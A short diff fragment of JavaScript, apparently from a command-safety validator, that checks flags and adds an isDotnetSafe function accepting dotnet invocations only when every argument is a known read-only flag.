+ config.additionalCommandIsDangerousCallback('', flagArgs)) {
1617
+ return false;
1618
+ }
1619
+ return validateFlags(flagArgs, 0, config);
1620
+ }
1621
+ function isDotnetSafe(args) {
1622
+ if (args.length === 0) {
1623
+ return false;
1624
+ }
1625
+ // dotnet uses top-level flags like --version, --info, --list-runtimes
1626
+ // All args must be in the safe set
1627
+ for (const arg of args) {
1628
+ if (!DOTNET_READ_ONLY_FLAGS.has(arg.toLowerCase())) {
1629
+ return false;
1630
+ }
1631
+ }
1632
+ return true;
1633
+ }